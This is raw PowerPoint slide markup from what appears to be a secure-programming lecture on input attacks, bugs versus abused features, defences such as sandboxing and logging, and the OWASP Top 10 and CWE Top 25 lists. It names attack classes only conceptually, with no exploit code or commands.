                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Out                         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or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       Malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Garbage In, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Out</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" i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en-GB" sz="1800" i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Input is dangerous:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Any line of code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  that  handles user input is at risk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Any  resources  (CPU cycles, memory, …) used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in processing introduce a risk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So ideally, both of these are kept to a minimum.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" i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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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2607"/>
            <a:ext cx="142894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Abusing bugs or features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Some input attacks exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Bugs in code can provide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>weird behaviour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>that is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accidentally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  introduced in the code by programmer;  Attackers try to trigger &amp; exploit such weird behaviour</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Classic example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buffer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0066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Other input attacks abuse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>features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Some flaws </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accidently</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>expose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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functionality that was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deliberately</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  introduced in the code, but which was not meant to be accessible by attackers.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRP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Classic example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>command &amp; SQL injection, or Word Macros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="339933"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="5715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The line between 1 &amp; 2  can be blurry, and a matter of opinion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1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045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Abusing bugs or features</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0" smtClean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F6ECECB-7A1A-4B54-B508-939C5DAF405F}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16388" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5630768" y="3675922"/>
            <a:ext cx="2930400" cy="4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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2177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abuse of) a feature !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355681" y="3364553"/>
            <a:ext cx="4288327" cy="6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>
            <a:normAutofit/>
          </a:bodyPr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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1814" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection aka Forwarding  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1814" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16390" name="Groep 6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="922648" y="3936993"/>
            <a:ext cx="7105736" cy="2352741"/>
            <a:chOff x="1184621" y="4348378"/>
            <a:chExt cx="7833427" cy="2593470"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Afgeronde rechthoek 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7026506" y="4618226"/>
              <a:ext cx="1704942" cy="144448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back-end service</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Explosie 2 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6594715" y="5202367"/>
              <a:ext cx="1217588" cy="630174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816855" y="5357926"/>
              <a:ext cx="1133453" cy="42540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/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16404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621" y="4760682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/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2437133" y="4973790"/>
              <a:ext cx="1077892" cy="2888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/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16406" name="TextBox 36"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2117675" y="4348378"/>
              <a:ext cx="1672928" cy="71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26" name="Rechthoek 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6088312" y="5478564"/>
              <a:ext cx="157160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/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6313732" y="5478564"/>
              <a:ext cx="158747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6409" name="TextBox 29"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5559211" y="5916835"/>
              <a:ext cx="3458837" cy="102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814" dirty="0" err="1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eg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1814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altLang="en-US" sz="1814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SQL query,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1814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or Word document with macros</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" altLang="en-US" sz="1814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3942054" y="4591241"/>
              <a:ext cx="1704942" cy="144448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application</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="20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6391" name="Groep 2"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1043608" y="1187200"/>
            <a:ext cx="5512320" cy="1671840"/>
            <a:chOff x="1198642" y="1031314"/>
            <a:chExt cx="6076764" cy="1843643"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Afgeronde rechthoek 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3978269" y="1431485"/>
              <a:ext cx="1720797" cy="1443472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application</a:t>
              </a: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16395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642" y="1575184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ight Arrow 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2544801" y="2042856"/>
              <a:ext cx="1077879" cy="28901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/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16397" name="TextBox 36"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2238575" y="1385624"/>
              <a:ext cx="1672928" cy="71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16398" name="TextBox 29"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5949505" y="1031314"/>
              <a:ext cx="1325901" cy="47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177" dirty="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a bug !</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" altLang="en-US" sz="2177" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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" name="Explosie 2 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4619599" y="2147663"/>
              <a:ext cx="1217576" cy="628840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0" name="Curved Down Arrow 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4503716" y="1901526"/>
              <a:ext cx="869923" cy="536737"/>
            </a:xfrm>
            <a:prstGeom prst="curvedDownArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 25000"/>
                <a:gd name="adj2" fmla="val 67231"/>
                <a:gd name="adj3" fmla="val 274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 bwMode="auto">
          <a:xfrm>
            <a:off x="355681" y="1009801"/>
            <a:ext cx="2540160" cy="7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>
            <a:normAutofit/>
          </a:bodyPr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Processing  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 Poll</a:t>
            </a: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5125033" y="2586885"/>
            <a:ext cx="2350504" cy="6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14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eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1814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buffer overflow in PDF viewer</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1814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defend against this?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339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prevent</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRP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Typically by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secure input handling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But also: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  handling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>! More on this later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339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933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the potential impact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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reduce the expressive power of inputs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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reduce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>priviliges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                                          isolate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sandbox </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> compartmentalise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1714500" lvl="3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Do not run your web server as root</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1714500" lvl="3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Do not run your customer web server on same machine as your salary administration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1714500" lvl="3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Run JavaScript inside browser sandbox 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339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection &amp; react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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933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to see if things go/have gone wrong</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Keep logs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if only for forensics afterwards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod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16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7063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More standard attacks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>&amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>a few exotic ones</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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4017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Standard attacks/security vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Tijdelijke aanduiding voor inhoud 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="456480" y="1148041"/>
            <a:ext cx="2603351" cy="43545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OWASP Top 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1270" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[2017]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1089" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1089" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Broken Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1089" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sensitive Data Exposure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1089" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML External Entities (XXE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1089" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Broken Access Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1089" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Misconfiguration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1089" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1089" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insecure Deserialization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1089" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using Components with            Known Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1089" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insufficient                                               Logging &amp; Monitoring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532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3059831" y="1121570"/>
            <a:ext cx="3240167" cy="489168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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SANS/CWE TOP 25 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1270" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[2019]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="907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sz="907" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Improper Restriction of Operations within the Bounds of a Memory Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="907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               2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="907" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="907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3. Improper Input  Validation                                                                                      4. Information exposure                                                                                               5. Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="907" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>overread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="907" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	                                                                                                  6. SQL Injection                                                                                                               7. Use After Free	                                                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="907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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="907" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
